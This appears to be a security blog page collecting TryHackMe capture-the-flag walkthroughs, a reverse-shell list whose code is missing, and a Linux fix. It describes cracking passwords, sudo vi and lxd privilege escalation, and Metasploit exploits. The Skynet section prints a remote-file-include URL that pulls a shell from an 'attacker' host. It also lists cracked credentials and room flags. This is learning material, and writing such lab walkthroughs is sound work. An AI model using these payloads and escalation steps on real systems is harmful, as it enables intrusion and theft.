[email protected]
gray hat freelancing logo

Chocolate Factory – Walkthrough

[Chocolate Factory] – TryHackMe

Starting off this challenge. We can see from the tags on TryHackMe that it involved steganography and privilege escalation (that second one being a give-in). As well, the questions tell us one of the username’s is ‘charlie’. Really no surprise there. Lets enumerate the box and start poking at some images.

Copy to Clipboard

While that scan ran (and it returned a lot of interesting information), I browsed to the website and grabbed the image.png from the CSS background. As well, I connected to the ftp, which allowed anonymous access and there was another image there named ‘gum_room.jpg’.

Inside ‘gum_room.jpg’ was a base64 encoded file which decoded and ended up being their entire /etc/passwd (presumably).

Copy to Clipboard

Above is the ‘b64.txt’ file embedded within ‘gum_room.jpg’ and below is the base64 decoded content, which is already being attacked by john the ripper.

Copy to Clipboard

The username charlie cracked with a password value of cn7824. These credentials worked to log into the squirrel room, which allows us to execute commands on the server, seemingly (we’ll continue to grab any images we find and poke around). These credentials did not work for SSH.

We use the command injection script to poke around, we grab the ‘key_rev_key’ file. The strings command reveals the answer to the first question the “key” is b’-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=’

Copy to Clipboard

We stabilize the shell, so we can attempt to sudo or su into the user charlie (since the password cracked didn’t work for SSH). But, neither of those work either. So, we simply jump into his user directory and we can see the files teleport and teleport.pub are SSH keys. Sure enough, we copy teleport down to our machine, chmod the permissions to 600 and ssh in as user charlie.

Copy to Clipboard

Next we check sudo -l to see what commands we might be able to run through sudo and we see gold, it allows /usr/bin/vi. So, a quick sudo /usr/bin/vi and then breakout with :!/bin/sh and we’re root.

Finally, we’re not quite done yet, there’s no root flag sitting in the folder, it’s a python script. We notice it asks for the key. So, we provide the key found in the ELF binary earlier and it gives us our final flag.

Pretty quick and easy. Once again, took a lot longer to write up than to actually do. Wasted some time playing with steganography when there was really only one tiny portion it was used for.

/home/charlie/user.txt:
flag{cd5509042371b34e4826e4838b522d2e}

/root/root.py:
flag{cec59161d338fef787fcb4e296b42124}

chocolate factory walkthrough tryhackme

Looking Glass – Walkthrough

[Looking Glass] – TryHackMe

The last Alice in Wonderland themed room was really fun, in my opinion. So, I was excited to take a crack at the next one. We start as always with nmap and immediately find some fun funky shit. Look at all these ports!

Copy to Clipboard

So, we have a few issues here. I tend to operate from my daily driver and wasn’t in the mood to launch the attack box, but Looking Glass is responding with a very insecure SSH key (rsa sha1). I decide to go ahead and accept it. Creating a config for this specific host, that I will delete later. ~/.ssh/config

Copy to Clipboard

Now we can connect these ports and we run into the first game.

Copy to Clipboard

It responds “Lower”. We try one on the higher end and it says “Higher”.. we’ve been told it’s a mirror, so obviously, it means the opposite. Lower means the port is Higher, Higher means the port is Lower.
We don’t have all day, so we automate this with a bash script.

Copy to Clipboard

My script stops at port 12394. So, lets see what’s here.

Copy to Clipboard

Time to crack this, I break out CyberChef. (TheAlphabetCipher) (bewareTheJabberwock)

jabberwock:GyroscopeStupiderPerfectlyIngenuity

the user.txt flag is obviously reversed:

}32a911966cab2d643f5d57d9e0173d56{mht

flipping it returns:

thm{65d3710e9d75d5f346d2bac669119a23}

the root flag is reversed as well (kind of redundant at this point, but consistency can be a virtue)

}f3dae6dec817ad10b750d79f6b7332cb{mht

Gaming Server – Walkthrough

[Gaming Server] – TryHackMe

This is a CTF walkthrough for the [Gaming Server] room on TryHackMe. Written live, so you can see what goes through my mind during a capture the flag campaign.[Gaming Server] has an estimated difficulty of easy.

First things first, enumerate:

Copy to Clipboard

So far, we likely have an Ubuntu box running OpenSSH and Apache. We’ll continue by brute forcing possible directories and files on Apache, while running a more intrusive nmap scan.

While those run, we’ll manually poke around the website and see what we can find.

By viewing the source, we see an HTML comment left for a ‘john’, a potential username. As well, our brute force turns up two interesting directories; uploads and secret.

gaming-server-room-tryhackme-view-source-username-john

The directory ‘secret’ holds a file ‘secretKey’ which looks like an SSH RSA key. If it is password protected, we’ll pass it to john (the password cracker), otherwise we’ll hope it’s the user John’s SSH key.

Copy to Clipboard

The uploads directory gives us a dictionary/wordlist which will likely be useful. As well, it contains a copy of the ‘Hacker’s Manifesto’ (originally published to Phrack a very long time ago.. always a classic). And an image that may contain something (any of those files may contain something. We’ll binwalk them.

Binwalk doesn’t turn up anything obvious, we also run exiftool against the image to see if there’s any other potential usernames or similar lurking around. Nothing blatantly obvious. So, we go ahead and try to ssh as ‘john’ using the SSH key we found. It turns out that it is password protected. So, we use ssh2john on it and set john against it using the dictionary we found.

Copy to Clipboard

John busts it open with a password of letmein.

Out first flag is waiting in the john user’s home folder, named user.txt it’s contents are: a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e.

So far, I have spent much, much more time writing this than working on the challenge.

An attempt to see what commands we can run with sudo shows us that john’s password is not letmein. Apparently, that only protects his SSH key. We also don’t see anything too unusual with SUID or GUID set. So, we transfer linpeas.sh over to automate discovery.

Short of finding anything else, we’re in the lxd gorup. So, we’re going to go ahead and vertically elevate ourselves to root by launching a small alpine image and mounting the outer systems as root.

Copy to Clipboard

The above commands grab a small linux container image of alpine, change directories, build the image and then make it available on our attacking machine. So, we will now be able to download and exploit it.

Copy to Clipboard

Another one that was a little too easy. As I said before, this took longer to write than the room took to clear. Oh well, there you have it.

Some Random Fixes for Manjaro

Error: Sparse file not allowed [GRUB]

While running linux manjaro on a btrfs, you may run into this seemingly harmless notification at boottime:

Error: Sparse file not allowed.
Press any key to continue...

Here’s how I got this to go away.

Edit /etc/default/grub and change GRUB_SAVEDEFAULT=true to GRUB_SAVEDEFAULT=false

Now run update-grub and reboot.

2022-01-24T14:16:17-05:00January 22nd, 2022|Categories: Engineering|Tags: , , , , , , |

Building a Perfect FreeBSD Desktop

2022-01-24T15:05:26-05:00January 22nd, 2022|Categories: Engineering|Tags: , , , , , |

FreeBSD Kernel Config for VirtualBox Guests

Copy to Clipboard
2022-01-21T19:38:05-05:00January 21st, 2022|Categories: Engineering|Tags: , , , , |

Reverse Shells

I used to keep these sprawled out across several blog posts. But, I’ve decided to scrap that whole approach and create a “reverse shell generator”. In the future, this post will either contain that generator or it will contain a link to it at the bottom. Anyway, while I work on that, here are all of the old ones that I had previously posted on the website for your convenience.

For the most part, you’d use these by setting up a netcat-style listener on your machine (or a machine you control), replace “your-ip” with the IP address of the machine you want to connect out to and “your-port” with the port you’ve chosen to listen on.

Copy to Clipboard

Python

Copy to Clipboard

Perl

Making use of the /bin/sh binary:

Copy to Clipboard

Without a binary:

Copy to Clipboard

Another one without a binary:

Copy to Clipboard

PHP

Copy to Clipboard

Ruby

Copy to Clipboard

Java

Copy to Clipboard

BASH

Copy to Clipboard

Netcat

Netcat binaries that support ‘-e’

Copy to Clipboard
Copy to Clipboard

Netcat binaries without support for ‘-e’

Copy to Clipboard

Telnet

Using a file socket:

Copy to Clipboard

Using a “pipe”:

Copy to Clipboard

Xterm

Copy to Clipboard

Bolt – Walkthrough

[Bolt] – TryHackMe

This one is rated easy and it shows it’s colors this way. It’s a super typical CTF for beginners and takes no time at all for anyone with any kind of knowledge. A foothold is given to you, you’re not required to be even slightly creative to turn that foothold into shell access and the server is misconfigured giving you root, right away.

You absolutely should not need my help for this, if you do. Either you’re drunk, drawing a blank or you really need to go back and work some of the learning rooms available at TryHackMe

We start off with nmap, hunting for web ports. We know from the room name that it’s going to involve the popular Bolt CMS. So, we expect to find web ports and to probably have to enumerate directories.

Copy to Clipboard

Right away, we have options. But, we decide to play by the rules and stay in our lane. We note that port 80 and 8000 are open. One serving Apache 2.4.29 and the other seeming to run self-hosted off of PHP 7.2.32-1. Without a list of potential users, we ignore SSH.. though, there’s plenty of fun that could be have there.

I choose lulzbuster and set after both ports, hoping that I don’t bog down the VM.. it doesn’t find anything unusual, just default pages on apache and it finds bolt on 8000, a few folders. But, before I can even explore those folders, I’m on the page and there’s a post from the admin telling us his name is Jake and that his username is bolt (no idea why he shares this). I note that it’s posted by ‘Admin’, but we all know that can be a display name. I just write it down incase ‘bolt’ is a rabbit hole, though I’m aware, bolt is the default username for bolt CMS already.

I notice there’s a read more link, expand the post, there’s nothing added except an obvious link “For IT Staff” and click it. He boldly (boltly? lol) tells us his password is boltadmin123. So, we have our first two answers:

bolt

boltadmin123

We find the well-known bolt administrative login right where it should be at /bolt/login , try our credentials and land inside to answer the next question. It’s version is bolt 3.7.1

The next question asks us about a metasploit module for a previous version of bolt, which was interesting. So, I launch msfconsole and search for bolt, answer the question.

exploit/unix/webapp/bolt_authenticated_rce

The exploit-db id is: 48296

Now, I’m just curious why they had us look up two old exploits that shouldn’t work on this release of bolt, so I fill in the options for metasploit and run the rce it has for the previous version. Surprisingly, it works. So, I find the flag at /home/flag.txt which I’d post here, but I’ve already closed that browser window. Sorry about that, I found it more necessary to go send an e-mail to CVE maintainers to update the information they have for this vulnerability, because it’s clearly not fixed by 3.7.1

Quick and easy, would’ve been annoyingly boring, except turned into fun by noticing that what people thought was fixed in 3.7.1 was NOT fixed.

Skynet –Walkthrough

[Skynet] – TryHackMe

I’m rebuilding the Skynet CTF on TryHackMe from vague notes.  So, I apologize for anything that’s mildly off.  I’ve been drinking and it was a few days ago. We always start off with enumeration, portscan, banner grab, service check, the usual. My ctf_quick alias is [code]sudo nmap -sS -sV -O -vvv -T4 –script=vulners –script=intrusive –script-timeout=2m -oA ctf_quick[/code], I often attach a few more flags, if needed, namely [code]-p- -Pn[/code], if I want to be sure to check all ports or if the target doesn’t respond to ICMP requests. My ctf_deep is the same, mostly, script-timeout is set up at 5 minutes, there’s no -T4 flag, version intensity is set to 9 and for both, I have a [code]alias BRUTE=’–script-args userdb=top-probable,passdb=1000worst'[/code], that I can pop in there. Though, generally I’ll only pop that into the deep scan with the longer time out, for obvious reasons.

It has a webserver, so we go ahead and launch a directory scanner too. I either used directory 2.3 lowercase medium or big from SecLists/Discovery/Web-Content . It picks up a few folders, most of which 403; admin, config, ai for sure.. there’s also css and js, I forget if they 403’d or not, but either way, they weren’t enlightening. /squirrelmail sticks out, however, we know what that is and the questions ask about email content. So, it’s a great place to start. Just bear in mind, e-mail accounts may not have shell access and/or authorization may vary.

When nmap finishes, we notice there’s a samba share, we enumerate it, it picks up a few shares and a user ‘milesdyson’, accessing the only share that allows anonymous access reveals log1.txt and it looks like a wordlist. The CTF is Skynet and it’s all terminator themed (miles dyson, etc.. etc.). We set hydra to work on squirrelmail using the milesdyson user and the wordlist and it cracks with a password of cyborg007haloterminator (this CTF is considered easy). Logging in, we see emails from the host itself regarding milesdyson’s samba password, so we write that down. )s{A&2Z=F^n_E.B` 

We note emails from a potential user ‘serenakogan’ and a binary encoded email, we decode it, it’s mostly uninteresting. says ‘balls have zero to me to me to me to me to me to me to me’. serenakogan’s next e-mail is similar, almost the same. We check milesdyon’s samba share with his credentials and they work, yay. He’s messaged himself about finishing the new CMS and mention a string of nonsensical characters 45kra24zxs28v3yd. Given that the question asks about a hidden directory and squirrelmail, nor are the others very hidden at all, plus the fact the important.txt mentions finishing a CMS, we try and browse to that folder and it exists. Looks benign, but we go ahead and brute force directories here too and we find another one, administrator, it’s running CuppaCMS. So, we set the string aside in a note, it could still be a password or need to be cracked or decoded.

We look for vulnerabilities for CuppaCMS and find there’s a nasty file include vulnerability (allows both remote file include and local file include). Local is easier to perform, so we check the obvious things, /etc/passwd (confirm actual user accounts that exist on the host, CuppaCMS reveals MySQL credentials, root:password123 . Informative, but nothing ground breaking, we go ahead with a remote file include. I used weevely3, but you can use whatever. Make the RFI available with python3’s built-in webserver (or any webserver). My include looked like this: http://ctf-target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attacker:8000/shell.txt?

I used the shell to throw down a meterpreter and went straight for root using exploit/linux/local/ufo_privilege_escalation. It worked. Working backwards another user was admin:b686468aec2c71e1783375763dca9b7e

Sorry for the crap write-up.

2022-01-24T02:39:41-05:00January 1st, 2022|Categories: CTF Walkthroughs|Tags: , , , , |

Advent of Cyber (2019) – TryHackMe – Day17

[Day 17] Hydra-ha-ha-haa

This room is just usingt the hydra tool to brute force a web form and then SSH. Reading the description informs you that the once popular rockyou.txt wordlist is recommended (advise you follow those kinds of tips).

(more…)

2021-12-29T16:55:36-05:00December 29th, 2021|Categories: CTF Walkthroughs|Tags: , , , , , |

Blog – CTF Walkthrough – TryHackME

[Blog] – CTF Walkthrough – TryHackMe

Billy Joel made a blog? First, we need to follow the instructions and add blog.thm to our /etc/hosts file (Windows users, your hosts file is under system32, somewhere).

Right away, browsing to the blog, we can see WordPress, an author level user with the account kwheeler (Karen Wheeler), who is supposedly Billy Joel’s mom and 2 comments created. We make note of the default 2020 theme, as well as the WordPress 5.0 generator meta tag (it’s already vulnerable). We can also add bjoel as target WordPress users from the comments (as well, nmap detected this, so.. doubly exposed).

We’ll be wanting to WPScan this. We also have several SMB shares (samba, ubuntu), Apache 2.4.49, OpenSSH.. at this point, I go ahead and start a brute force on bjoel with the rockyou wordlist (might work), over SSH.

Copy to Clipboard

Choosing Bill Joel’s account instead of Karen didn’t come from nowhere. For starters, kwheeler is the WordPress administrator, we’ll likely get her credentials more easily. But, first and foremost, one of the Samba shares is “BillySMB”, so clearly he has a user level account on the system (or it’s extremely likely).

We notice our hydra bruteforce is bogging down the VM, so we cancel it for now. Lets go ahead and grab the files off of BillySMB.

Copy to Clipboard

While we’re fucking around, WPScan cracks kwheel’s wordpress user wide open, password is cutiepie1. We launch metasploit and run ‘search wordpress 5.0’ and we immediately find remote code execution. Rather than fiddle around outside of a pty, we try to ssh in with those credentials to no avail. So, metasploit it is. We shut down our scanners, brute forcers and all of that. The exploit wp_crop_rce works just fine, gives us www-data user access and we elevate privileges with sudo_baron_samedit. The box is rooted.

2022-01-22T22:12:00-05:00December 24th, 2021|Categories: CTF Walkthroughs|Tags: , , , , |

Advent of Cyber (2019) – TryHackMe – Day16

[Day 16 – Advent of Cyber (2019)]

File Confusion

Sorry, I’m not going to go back and jot down the how-tos for all of the other days. Besides, there’s plenty of help floating around the internet for basically any capture the flag game.

Obligatory link to TryHackMe

Download the Task Files and read the supporting material.

 

How many files did you extract(excluding all the .zip files): 50

Copy to Clipboard

How many files contain Version: 1.1 in their metadata?: 3

Copy to Clipboard

Which file contains the password? dL6w.txt

Copy to Clipboard
2022-01-24T00:22:48-05:00December 23rd, 2021|Categories: CTF Walkthroughs|Tags: , , , , |
Go to Top